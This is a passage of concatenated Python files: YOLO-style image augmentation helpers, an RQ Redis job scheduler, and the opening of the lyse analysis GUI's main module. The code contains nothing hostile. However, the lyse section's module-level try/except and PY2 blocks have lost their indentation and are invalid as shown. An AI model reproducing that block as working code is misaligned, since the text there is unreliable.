        elif i == 5:  # bottom
            c = s + w0 - w, s + h0, s + w0, s + h0 + h
        elif i == 6:  # bottom left
            c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
        elif i == 7:  # left
            c = s - w, s + h0 - h, s, s + h0
        elif i == 8:  # top left
            c = s - w, s + h0 - hp - h, s, s + h0 - hp

        padx, pady = c[:2]  # image-to-mosaic coordinate offsets (may be negative)
        x1, y1, x2, y2 = [max(x, 0) for x in c]  # allocate coords, clipped to the canvas

        # Labels
        x = self.labels[index]
        labels = x.copy()
        if x.size > 0:  # Normalized xywh to pixel xyxy format (mosaic coordinates)
            labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padx
            labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + pady
            labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padx
            labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + pady
        labels9.append(labels)

        # Image: paste the part of img that falls inside the canvas
        img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:]  # img9[ymin:ymax, xmin:xmax]
        hp, wp = h, w  # height, width previous

    # Offset: take a random (2s, 2s) crop out of the (3s, 3s) canvas
    yc, xc = [int(random.uniform(0, s)) for x in self.mosaic_border]  # mosaic center x, y
    img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]

    # Concat/clip labels (shifted into cropped coordinates)
    if len(labels9):
        labels9 = np.concatenate(labels9, 0)
        labels9[:, [1, 3]] -= xc
        labels9[:, [2, 4]] -= yc
        np.clip(labels9[:, 1:], 0, 2 * s, out=labels9[:, 1:])  # use with random_perspective
        # img9, labels9 = replicate(img9, labels9)  # replicate

    # Augment
    img9, labels9 = random_perspective(img9, labels9,
                                       degrees=self.hyp['degrees'],
                                       translate=self.hyp['translate'],
                                       scale=self.hyp['scale'],
                                       shear=self.hyp['shear'],
                                       perspective=self.hyp['perspective'],
                                       border=self.mosaic_border)  # border to remove

    return img9, labels9
def replicate(img, labels):
    """Duplicate the smaller half of the labelled boxes at random positions.

    Each selected box's pixels are pasted into *img* in place and a matching
    row is appended to *labels*.  Returns the (mutated) image and the grown
    label array.
    """
    h, w = img.shape[:2]
    boxes = labels[:, 1:].astype(int)
    x1, y1, x2, y2 = boxes.T
    half_perimeter = ((x2 - x1) + (y2 - y1)) / 2  # proxy for box size (pixels)
    smallest_half = half_perimeter.argsort()[:round(half_perimeter.size * 0.5)]
    for i in smallest_half:
        x1b, y1b, x2b, y2b = boxes[i]
        bh, bw = y2b - y1b, x2b - x1b
        # random top-left corner keeping the pasted copy fully inside the image
        yc = int(random.uniform(0, h - bh))
        xc = int(random.uniform(0, w - bw))
        x1a, y1a, x2a, y2a = xc, yc, xc + bw, yc + bh
        img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b]  # paste the box pixels
        labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
    return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, auto_size=32):
    """Resize *img* to fit *new_shape* preserving aspect ratio, padding the
    remainder with *color*.

    auto=True pads only to the nearest multiple of *auto_size* (minimum
    rectangle); scaleFill=True stretches with no padding.  Returns the new
    image, the (w, h) scale ratios and the per-side (dw, dh) padding.
    https://github.com/ultralytics/yolov3/issues/232
    """
    shape = img.shape[:2]  # current shape [height, width]
    if isinstance(new_shape, int):
        new_shape = (new_shape, new_shape)

    # Scale ratio (new / old)
    r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
    if not scaleup:  # only scale down, do not scale up (for better test mAP)
        r = min(r, 1.0)

    # Compute padding
    ratio = r, r  # width, height ratios
    new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
    dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1]  # wh padding
    if auto:  # minimum rectangle
        dw, dh = np.mod(dw, auto_size), np.mod(dh, auto_size)  # wh padding
    elif scaleFill:  # stretch
        dw, dh = 0.0, 0.0
        new_unpad = (new_shape[1], new_shape[0])
        ratio = new_shape[1] / shape[1], new_shape[0] / shape[0]  # width, height ratios

    dw /= 2  # divide padding into 2 sides
    dh /= 2

    if shape[::-1] != new_unpad:  # resize
        img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
    # the +/- 0.1 before rounding splits an odd pixel of padding between sides
    top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
    left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
    img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color)  # add border
    return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
    """Apply a random centre/perspective/rotate-scale/shear/translate warp to
    *img* and transform *targets* ([cls, x1, y1, x2, y2] rows) to match.

    Boxes that become too small, too distorted, or lose too much area are
    dropped via box_candidates.  Returns the warped image and kept targets.
    """
    # torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
    # targets = [cls, xyxy]

    # negative border shrinks the output (used by the mosaic loaders)
    height = img.shape[0] + border[0] * 2  # shape(h,w,c)
    width = img.shape[1] + border[1] * 2

    # Center: move the image centre to the origin before the other transforms
    C = np.eye(3)
    C[0, 2] = -img.shape[1] / 2  # x translation (pixels)
    C[1, 2] = -img.shape[0] / 2  # y translation (pixels)

    # Perspective
    P = np.eye(3)
    P[2, 0] = random.uniform(-perspective, perspective)  # x perspective (about y)
    P[2, 1] = random.uniform(-perspective, perspective)  # y perspective (about x)

    # Rotation and Scale
    R = np.eye(3)
    a = random.uniform(-degrees, degrees)
    # a += random.choice([-180, -90, 0, 90])  # add 90deg rotations to small rotations
    s = random.uniform(1 - scale, 1 + scale)
    # s = 2 ** random.uniform(-scale, scale)
    R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)

    # Shear
    S = np.eye(3)
    S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # x shear (deg)
    S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # y shear (deg)

    # Translation
    T = np.eye(3)
    T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width  # x translation (pixels)
    T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height  # y translation (pixels)

    # Combined rotation matrix
    M = T @ S @ R @ P @ C  # order of operations (right to left) is IMPORTANT
    if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any():  # image changed
        if perspective:
            img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
        else:  # affine
            img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))

    # Visualize
    # import matplotlib.pyplot as plt
    # ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
    # ax[0].imshow(img[:, :, ::-1])  # base
    # ax[1].imshow(img2[:, :, ::-1])  # warped

    # Transform label coordinates
    n = len(targets)
    if n:
        # warp points: all four corners of every box
        xy = np.ones((n * 4, 3))
        xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2)  # x1y1, x2y2, x1y2, x2y1
        xy = xy @ M.T  # transform
        if perspective:
            xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8)  # rescale
        else:  # affine
            xy = xy[:, :2].reshape(n, 8)

        # create new boxes: axis-aligned bounding box of the warped corners
        x = xy[:, [0, 2, 4, 6]]
        y = xy[:, [1, 3, 5, 7]]
        xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T

        # # apply angle-based reduction of bounding boxes
        # radians = a * math.pi / 180
        # reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
        # x = (xy[:, 2] + xy[:, 0]) / 2
        # y = (xy[:, 3] + xy[:, 1]) / 2
        # w = (xy[:, 2] - xy[:, 0]) * reduction
        # h = (xy[:, 3] - xy[:, 1]) * reduction
        # xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T

        # clip boxes
        xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
        xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)

        # filter candidates (original boxes pre-scaled by s for a fair comparison)
        i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
        targets = targets[i]
        targets[:, 1:5] = xy[i]

    return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1):  # box1(4,n), box2(4,n)
    """Boolean mask of boxes that survive augmentation.

    *box1* is the (4, n) xyxy array before augmentation, *box2* the same boxes
    after.  A box is kept when the augmented box exceeds *wh_thr* pixels in
    both dimensions, retains more than *area_thr* of the original area, and
    has an aspect ratio below *ar_thr*.
    """
    w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
    w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
    aspect = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16))  # aspect ratio (>= 1)
    big_enough = (w2 > wh_thr) & (h2 > wh_thr)
    area_kept = w2 * h2 / (w1 * h1 + 1e-16) > area_thr
    return big_enough & area_kept & (aspect < ar_thr)  # candidates
def cutout(image, labels):
    """Paint random rectangles of random colour over *image* (in place) and
    drop any label whose box ends up more than 60% covered.

    Returns the surviving label rows.
    Cutout augmentation: https://arxiv.org/abs/1708.04552
    """
    h, w = image.shape[:2]

    def bbox_ioa(box1, box2):
        # Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
        box2 = box2.transpose()

        # Get the coordinates of bounding boxes
        b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
        b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]

        # Intersection area
        inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
                     (np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)

        # box2 area (epsilon guards against division by zero)
        box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16

        # Intersection over box2 area
        return inter_area / box2_area

    # create random masks: one half-size, two quarter-size, four eighth-size, ...
    scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16  # image size fraction
    for s in scales:
        mask_h = random.randint(1, int(h * s))
        mask_w = random.randint(1, int(w * s))

        # box, roughly centred on a random point and clipped to the image
        xmin = max(0, random.randint(0, w) - mask_w // 2)
        ymin = max(0, random.randint(0, h) - mask_h // 2)
        xmax = min(w, xmin + mask_w)
        ymax = min(h, ymin + mask_h)

        # apply random color mask
        image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]

        # return unobscured labels (the smallest masks don't trigger filtering)
        if len(labels) and s > 0.03:
            box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
            ioa = bbox_ioa(box, labels[:, 1:5])  # intersection over area
            labels = labels[ioa < 0.60]  # remove >60% obscured labels

    return labels
def create_folder(path='./new'):
    """Create an empty folder at *path*, removing any existing folder first."""
    if os.path.exists(path):
        # wipe the previous output so the new folder starts empty
        shutil.rmtree(path)
    os.makedirs(path)
def flatten_recursive(path='../coco128'):
    """Flatten a directory tree: copy every file found under *path* (at any
    depth) into a new sibling folder named '<path>_flat'.

    *path* may be a str or a pathlib.Path (the original `path + '_flat'`
    raised TypeError for Path inputs).  Note: files are copied under their
    base name only, so same-named files in different subdirectories
    silently overwrite each other.
    """
    path = str(path)  # accept pathlib.Path as well as str
    new_path = Path(path + '_flat')
    create_folder(new_path)
    for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
        shutil.copyfile(file, new_path / Path(file).name)
|
scheduler.py | import logging
import os
import signal
import time
import traceback
from datetime import datetime
from enum import Enum
from multiprocessing import Process
from redis import SSLConnection, UnixDomainSocketConnection
from .defaults import DEFAULT_LOGGING_DATE_FORMAT, DEFAULT_LOGGING_FORMAT
from .job import Job
from .logutils import setup_loghandlers
from .queue import Queue
from .registry import ScheduledJobRegistry
from .serializers import resolve_serializer
from .utils import current_timestamp
# Redis key templates, formatted with a queue name.  The locking key is the
# per-queue lock a scheduler must hold to schedule that queue's jobs (see
# RQScheduler.get_locking_key / acquire_locks).
SCHEDULER_KEY_TEMPLATE = 'rq:scheduler:%s'
SCHEDULER_LOCKING_KEY_TEMPLATE = 'rq:scheduler-lock:%s'
class SchedulerStatus(str, Enum):
    """Lifecycle states of the scheduler (str-valued, so members compare and
    serialize as plain strings)."""
    STARTED = 'started'
    WORKING = 'working'
    STOPPED = 'stopped'
class RQScheduler:
    """Moves due jobs from per-queue ScheduledJobRegistry instances onto
    their queues.

    A scheduler competes for one Redis lock per queue (SET NX); only the
    lock holder schedules jobs for that queue, so several schedulers can
    run safely against the same Redis.  The polling loop itself runs in a
    child process started by start().
    """

    # STARTED: scheduler has been started but sleeping
    # WORKING: scheduler is in the midst of scheduling jobs
    # STOPPED: scheduler is in stopped condition
    Status = SchedulerStatus

    def __init__(self, queues, connection, interval=1, logging_level=logging.INFO,
                 date_format=DEFAULT_LOGGING_DATE_FORMAT,
                 log_format=DEFAULT_LOGGING_FORMAT, serializer=None):
        self._queue_names = set(parse_names(queues))
        self._acquired_locks = set()
        self._scheduled_job_registries = []
        self.lock_acquisition_time = None
        # Copy the connection kwargs before mutating them in order to not change the arguments
        # used by the current connection pool to create new connections
        self._connection_kwargs = connection.connection_pool.connection_kwargs.copy()
        # Redis does not accept parser_class argument which is sometimes present
        # on connection_pool kwargs, for example when hiredis is used
        self._connection_kwargs.pop('parser_class', None)
        self._connection_class = connection.__class__  # client
        connection_class = connection.connection_pool.connection_class
        if issubclass(connection_class, SSLConnection):
            self._connection_kwargs['ssl'] = True
        if issubclass(connection_class, UnixDomainSocketConnection):
            # The connection keyword arguments are obtained from
            # `UnixDomainSocketConnection`, which expects `path`, but passed to
            # `redis.client.Redis`, which expects `unix_socket_path`, renaming
            # the key is necessary.
            # `path` is not left in the dictionary as that keyword argument is
            # not expected by `redis.client.Redis` and would raise an exception.
            self._connection_kwargs['unix_socket_path'] = self._connection_kwargs.pop(
                'path'
            )
        self.serializer = resolve_serializer(serializer)
        # connection is created lazily (and recreated after fork, see start())
        self._connection = None
        self.interval = interval
        self._stop_requested = False
        self._status = self.Status.STOPPED
        self._process = None
        self.log = logging.getLogger(__name__)
        setup_loghandlers(
            level=logging_level,
            name=__name__,
            log_format=log_format,
            date_format=date_format,
        )

    @property
    def connection(self):
        """Lazily created Redis client, rebuilt from the copied kwargs."""
        if self._connection:
            return self._connection
        self._connection = self._connection_class(**self._connection_kwargs)
        return self._connection

    @property
    def acquired_locks(self):
        # Names of the queues whose scheduler locks this instance holds.
        return self._acquired_locks

    @property
    def status(self):
        # Current SchedulerStatus value.
        return self._status

    @property
    def should_reacquire_locks(self):
        """Returns True if lock_acquisition_time is longer than 10 minutes ago"""
        if self._queue_names == self.acquired_locks:
            # already holding every lock we want; nothing to reacquire
            return False
        if not self.lock_acquisition_time:
            return True
        return (datetime.now() - self.lock_acquisition_time).total_seconds() > 600

    def acquire_locks(self, auto_start=False):
        """Returns names of queue it successfully acquires lock on"""
        successful_locks = set()
        pid = os.getpid()
        self.log.info("Trying to acquire locks for %s", ", ".join(self._queue_names))
        for name in self._queue_names:
            # SET NX EX: only one scheduler process can hold a queue's lock;
            # the 60 s expiry is refreshed by heartbeat()
            if self.connection.set(self.get_locking_key(name), pid, nx=True, ex=60):
                successful_locks.add(name)

        # Always reset _scheduled_job_registries when acquiring locks
        self._scheduled_job_registries = []
        self._acquired_locks = self._acquired_locks.union(successful_locks)

        self.lock_acquisition_time = datetime.now()

        # If auto_start is requested and scheduler is not started,
        # run self.start()
        if self._acquired_locks and auto_start:
            if not self._process:
                self.start()

        return successful_locks

    def prepare_registries(self, queue_names=None):
        """Prepare scheduled job registries for use"""
        self._scheduled_job_registries = []
        if not queue_names:
            queue_names = self._acquired_locks
        for name in queue_names:
            self._scheduled_job_registries.append(
                ScheduledJobRegistry(name, connection=self.connection)
            )

    @classmethod
    def get_locking_key(cls, name):
        """Returns scheduler key for a given queue name"""
        return SCHEDULER_LOCKING_KEY_TEMPLATE % name

    def enqueue_scheduled_jobs(self):
        """Enqueue jobs whose timestamp is in the past"""
        self._status = self.Status.WORKING

        if not self._scheduled_job_registries and self._acquired_locks:
            self.prepare_registries()

        for registry in self._scheduled_job_registries:
            timestamp = current_timestamp()

            # TODO: try to use Lua script to make get_jobs_to_schedule()
            # and remove_jobs() atomic
            job_ids = registry.get_jobs_to_schedule(timestamp)

            if not job_ids:
                continue

            queue = Queue(registry.name, connection=self.connection, serializer=self.serializer)

            with self.connection.pipeline() as pipeline:
                jobs = Job.fetch_many(
                    job_ids, connection=self.connection, serializer=self.serializer
                )
                for job in jobs:
                    # fetch_many yields None for job ids whose data has vanished
                    if job is not None:
                        queue.enqueue_job(job, pipeline=pipeline)
                        registry.remove(job, pipeline=pipeline)
                pipeline.execute()
        self._status = self.Status.STARTED

    def _install_signal_handlers(self):
        """Installs signal handlers for handling SIGINT and SIGTERM
        gracefully.
        """
        signal.signal(signal.SIGINT, self.request_stop)
        signal.signal(signal.SIGTERM, self.request_stop)

    def request_stop(self, signum=None, frame=None):
        """Toggle self._stop_requested that's checked on every loop"""
        self._stop_requested = True

    def heartbeat(self):
        """Updates the TTL on scheduler keys and the locks"""
        self.log.debug("Scheduler sending heartbeat to %s",
                       ", ".join(self.acquired_locks))
        # NOTE(review): this refreshes the TTL for every queue name, not just
        # the locks this instance actually holds — confirm that is intended,
        # as it can extend a lock owned by another scheduler.
        if len(self._queue_names) > 1:
            with self.connection.pipeline() as pipeline:
                for name in self._queue_names:
                    key = self.get_locking_key(name)
                    pipeline.expire(key, self.interval + 5)
                pipeline.execute()
        else:
            key = self.get_locking_key(next(iter(self._queue_names)))
            self.connection.expire(key, self.interval + 5)

    def stop(self):
        """Release all locks and mark the scheduler STOPPED."""
        self.log.info("Scheduler stopping, releasing locks for %s...",
                      ','.join(self._queue_names))
        self.release_locks()
        self._status = self.Status.STOPPED

    def release_locks(self):
        """Release acquired locks"""
        # NOTE(review): deletes the lock keys for every configured queue, even
        # ones whose lock was never acquired by this instance — verify.
        keys = [self.get_locking_key(name) for name in self._queue_names]
        self.connection.delete(*keys)
        self._acquired_locks = set()

    def start(self):
        """Launch the scheduling loop (run()) in a child process."""
        self._status = self.Status.STARTED
        # Redis instance can't be pickled across processes so we need to
        # clean this up before forking
        self._connection = None
        self._process = Process(target=run, args=(self,), name='Scheduler')
        self._process.start()
        return self._process

    def work(self):
        """Main loop: (re)acquire locks, enqueue due jobs, heartbeat, sleep."""
        self._install_signal_handlers()
        while True:
            if self._stop_requested:
                self.stop()
                break

            if self.should_reacquire_locks:
                self.acquire_locks()

            self.enqueue_scheduled_jobs()
            self.heartbeat()
            time.sleep(self.interval)
def run(scheduler):
    """Child-process entry point: run the scheduler's loop until stopped.

    Any exception — including KeyboardInterrupt/SystemExit, hence the
    deliberate bare except — is logged with a traceback and re-raised so
    the child process exits with an error status.
    """
    scheduler.log.info("Scheduler for %s started with PID %s",
                       ','.join(scheduler._queue_names), os.getpid())
    try:
        scheduler.work()
    except:  # noqa
        scheduler.log.error(
            'Scheduler [PID %s] raised an exception.\n%s',
            os.getpid(), traceback.format_exc()
        )
        raise
    scheduler.log.info("Scheduler with PID %s has stopped", os.getpid())
def parse_names(queues_or_names):
    """Given a list of strings or queues, returns queue names"""
    return [
        item.name if isinstance(item, Queue) else str(item)
        for item in queues_or_names
    ]
|
__main__.py | from __future__ import division, unicode_literals, print_function, absolute_import # Ease the transition to Python 3
import os
import labscript_utils.excepthook
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2.10.0', '3')
# Splash screen
from labscript_utils.splash import Splash
splash = Splash(os.path.join(os.path.dirname(__file__), 'lyse.svg'))
splash.show()
splash.update_text('importing standard library modules')
# stdlib imports
import sys
import socket
import logging
import threading
import signal
import subprocess
import time
import traceback
import pprint
import ast
# 3rd party imports:
splash.update_text('importing numpy')
import numpy as np
splash.update_text('importing h5_lock and h5py')
import labscript_utils.h5_lock
import h5py
splash.update_text('importing pandas')
import pandas
splash.update_text('importing Qt')
check_version('qtutils', '2.2.2', '3.0.0')
splash.update_text('importing labscript suite modules')
check_version('labscript_utils', '2.12.4', '3')
from labscript_utils.ls_zprocess import ZMQServer, ProcessTree
import zprocess
from labscript_utils.labconfig import LabConfig, config_prefix
from labscript_utils.setup_logging import setup_logging
from labscript_utils.qtwidgets.headerview_with_widgets import HorizontalHeaderViewWithWidgets
from labscript_utils.qtwidgets.outputbox import OutputBox
import labscript_utils.shared_drive as shared_drive
from lyse.dataframe_utilities import (concat_with_padding,
get_dataframe_from_shot,
replace_with_padding)
from qtutils.qt import QtCore, QtGui, QtWidgets
from qtutils.qt.QtCore import pyqtSignal as Signal
from qtutils import inmain_decorator, inmain, UiLoader, DisconnectContextManager
from qtutils.auto_scroll_to_end import set_auto_scroll_to_end
import qtutils.icons
from labscript_utils import PY2
if PY2:
str = unicode
import Queue as queue
else:
import queue
from lyse import LYSE_DIR
process_tree = ProcessTree.instance()
# Set a meaningful name for zlock client id:
process_tree.zlock_client.set_process_name('lyse')
def set_win_appusermodel(window_id):
    """Register this window with the Windows shell: taskbar icon, app id and
    the command used to relaunch lyse from the taskbar."""
    from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
    icon_path = os.path.join(LYSE_DIR, 'lyse.ico')
    interpreter = sys.executable.lower()
    if not interpreter.endswith('w.exe'):
        # prefer the windowless interpreter (pythonw.exe) when relaunching
        interpreter = interpreter.replace('.exe', 'w.exe')
    relaunch_command = ' '.join([interpreter, os.path.join(LYSE_DIR, '__main__.py')])
    set_appusermodel(window_id, appids['lyse'], icon_path, relaunch_command,
                     app_descriptions['lyse'])
@inmain_decorator()
def error_dialog(message):
    """Show a modal warning dialog over the main window; inmain_decorator
    makes this safe to call from any thread."""
    QtWidgets.QMessageBox.warning(app.ui, 'lyse', message)
@inmain_decorator()
def question_dialog(message):
    """Show a modal yes/no dialog; return True iff the user clicked Yes.
    inmain_decorator makes this safe to call from any thread."""
    reply = QtWidgets.QMessageBox.question(app.ui, 'lyse', message,
                                           QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
    return (reply == QtWidgets.QMessageBox.Yes)
def scientific_notation(x, sigfigs=4, mode='eng'):
    """Format the float *x* as a unicode string with *sigfigs* significant
    figures.

    mode='eng' uses an SI prefix when one exists for the (multiple-of-3)
    exponent and falls back to 10^n notation otherwise; mode='exponential'
    always uses 10^n notation.  NaN/inf are returned via str(); non-floats
    raise TypeError.
    """
    times = u'\u00d7'
    thinspace = u'\u2009'
    hairspace = u'\u200a'
    superscripts = {u'-': u'\u207b',
                    u'0': u'\u2070',
                    u'1': u'\xb9',
                    u'2': u'\xb2',
                    u'3': u'\xb3',
                    u'4': u'\u2074',
                    u'5': u'\u2075',
                    u'6': u'\u2076',
                    u'7': u'\u2077',
                    u'8': u'\u2078',
                    u'9': u'\u2079'}
    si_prefixes = {
        -24: u"y",
        -21: u"z",
        -18: u"a",
        -15: u"f",
        -12: u"p",
        -9: u"n",
        -6: u"\u03bc",
        -3: u"m",
        0: u"",
        3: u"k",
        6: u"M",
        9: u"G",
        12: u"T",
        15: u"P",
        18: u"E",
        21: u"Z",
        24: u"Y"
    }
    if not isinstance(x, float):
        raise TypeError('x must be floating point number')
    if np.isnan(x) or np.isinf(x):
        return str(x)

    # engineering exponent: the largest multiple of 3 not exceeding log10|x|
    exponent = 0
    if x != 0:
        exponent = int(np.floor(np.log10(np.abs(x))))
        exponent = int(np.floor(exponent / 3) * 3)

    significand = x / 10 ** exponent
    # divmod (rather than int()) floors toward -inf, matching the original
    # digit count for negative significands
    integer_digits = len(str(int(divmod(significand, 1)[0])))
    significand = round(significand, sigfigs - integer_digits)
    result = str(significand)

    if not exponent:
        return result
    if mode == 'eng' and exponent in si_prefixes:
        # an SI prefix exists for this power of ten — use it
        return result + hairspace + si_prefixes[exponent]
    if mode == 'eng' or mode == 'exponential':
        # scientific notation with unicode superscript exponent
        superscript = ''.join(superscripts.get(char, char) for char in str(exponent))
        return result + thinspace + times + thinspace + '10' + superscript
    return result
def get_screen_geometry():
    """Return a list of the geometries of each screen: each a tuple of
    left, top, width and height"""
    geoms = []
    desktop = qapplication.desktop()  # relies on the module-level QApplication
    for i in range(desktop.screenCount()):
        sg = desktop.screenGeometry(i)
        geoms.append((sg.left(), sg.top(), sg.width(), sg.height()))
    return geoms
class WebServer(ZMQServer):
    """ZMQ request server: answers 'hello' (liveness), 'get dataframe', and
    accepts shot filepaths (as a plain string or {'filepath': ...} dict) to
    queue for analysis."""

    def handler(self, request_data):
        """Dispatch a single request and return the reply object."""
        logger.info('WebServer request: %s' % str(request_data))
        if request_data == 'hello':
            return 'hello'
        elif request_data == 'get dataframe':
            # convert_objects() picks fixed datatypes for columns that are
            # compatible with fixed datatypes, dramatically speeding up
            # pickling. But we don't impose fixed datatypes earlier than now
            # because the user is free to use mixed datatypes in a column, and
            # we won't want to prevent values of a different type being added
            # in the future. All kwargs False because we don't want to coerce
            # strings to numbers or anything - just choose the correct
            # datatype for columns that are already a single datatype:
            # NOTE(review): DataFrame.convert_objects was removed in modern
            # pandas — confirm the pandas version pinned for lyse still has it.
            return app.filebox.shots_model.dataframe.convert_objects(
                convert_dates=False, convert_numeric=False, convert_timedeltas=False)
        elif isinstance(request_data, dict):
            if 'filepath' in request_data:
                h5_filepath = shared_drive.path_to_local(request_data['filepath'])
                if isinstance(h5_filepath, bytes):
                    h5_filepath = h5_filepath.decode('utf8')
                if not isinstance(h5_filepath, str):
                    raise AssertionError(str(type(h5_filepath)) + ' is not str or bytes')
                app.filebox.incoming_queue.put(h5_filepath)
                return 'added successfully'
        elif isinstance(request_data, str):
            # Just assume it's a filepath:
            app.filebox.incoming_queue.put(shared_drive.path_to_local(request_data))
            return "Experiment added successfully\n"
        return ("error: operation not supported. Recognised requests are:\n "
                "'get dataframe'\n 'hello'\n {'filepath': <some_h5_filepath>}")
class LyseMainWindow(QtWidgets.QMainWindow):
    """Main window: emits firstPaint / newWindow signals and delays closing
    until the app's analysis workers have terminated (up to a timeout)."""

    # A signal to show that the window is shown and painted.
    firstPaint = Signal()

    # A signal for when the window manager has created a new window for this widget:
    newWindow = Signal(int)

    def __init__(self, *args, **kwargs):
        QtWidgets.QMainWindow.__init__(self, *args, **kwargs)
        self._previously_painted = False  # so firstPaint only fires once
        self.closing = False  # set once shutdown has been approved

    def closeEvent(self, event):
        """Intercept close: ask the app to shut down, then close for real once
        the workers have exited (see delayedClose)."""
        if self.closing:
            return QtWidgets.QMainWindow.closeEvent(self, event)
        if app.on_close_event():
            self.closing = True
            # give workers up to 2 seconds to terminate before forcing the close
            timeout_time = time.time() + 2
            self.delayedClose(timeout_time)
        event.ignore()

    def delayedClose(self, timeout_time):
        """Poll every 50 ms until all workers terminated (or timeout), then close."""
        if not all(app.workers_terminated().values()) and time.time() < timeout_time:
            QtCore.QTimer.singleShot(50, lambda: self.delayedClose(timeout_time))
        else:
            QtCore.QTimer.singleShot(0, self.close)

    def event(self, event):
        result = QtWidgets.QMainWindow.event(self, event)
        if event.type() == QtCore.QEvent.WinIdChange:
            # the window manager assigned a new native window id
            self.newWindow.emit(self.effectiveWinId())
        return result

    def paintEvent(self, event):
        result = QtWidgets.QMainWindow.paintEvent(self, event)
        if not self._previously_painted:
            self._previously_painted = True
            self.firstPaint.emit()
        return result
class AnalysisRoutine(object):
    """A single analysis routine: a user script run in its own worker
    subprocess, represented by one row in a RoutineBox's model."""
    def __init__(self, filepath, model, output_box_port, checked=QtCore.Qt.Checked):
        self.filepath = filepath
        self.shortname = os.path.basename(self.filepath)
        self.model = model
        self.output_box_port = output_box_port
        # Mirror RoutineBox's column/role constants for convenience:
        self.COL_ACTIVE = RoutineBox.COL_ACTIVE
        self.COL_STATUS = RoutineBox.COL_STATUS
        self.COL_NAME = RoutineBox.COL_NAME
        self.ROLE_FULLPATH = RoutineBox.ROLE_FULLPATH
        self.error = False
        self.done = False
        self.to_worker, self.from_worker, self.worker = self.start_worker()
        # Make a row to put into the model:
        active_item = QtGui.QStandardItem()
        active_item.setCheckable(True)
        active_item.setCheckState(checked)
        info_item = QtGui.QStandardItem()
        name_item = QtGui.QStandardItem(self.shortname)
        name_item.setToolTip(self.filepath)
        name_item.setData(self.filepath, self.ROLE_FULLPATH)
        self.model.appendRow([active_item, info_item, name_item])
        self.exiting = False
    def start_worker(self):
        """Launch the analysis subprocess and return its
        (to_worker, from_worker, worker) handles."""
        # Start a worker process for this analysis routine:
        worker_path = os.path.join(LYSE_DIR, 'analysis_subprocess.py')
        child_handles = process_tree.subprocess(
            worker_path,
            output_redirection_port=self.output_box_port,
            startup_timeout=30,
        )
        to_worker, from_worker, worker = child_handles
        # Tell the worker what script it will be executing:
        to_worker.put(self.filepath)
        return to_worker, from_worker, worker
    def do_analysis(self, filepath):
        """Ask the worker to analyse the given file, blocking until it
        replies. Returns (success, data) where data is whatever the worker
        sent back with its 'done' or 'error' signal."""
        self.to_worker.put(['analyse', filepath])
        signal, data = self.from_worker.get()
        if signal == 'error':
            return False, data
        elif signal == 'done':
            return True, data
        else:
            raise ValueError('invalid signal %s'%str(signal))
    @inmain_decorator()
    def set_status(self, status):
        """Set this routine's status icon and done/error flags. `status` is
        one of 'done', 'working', 'error' or 'clear'. Runs in the main
        thread via inmain_decorator."""
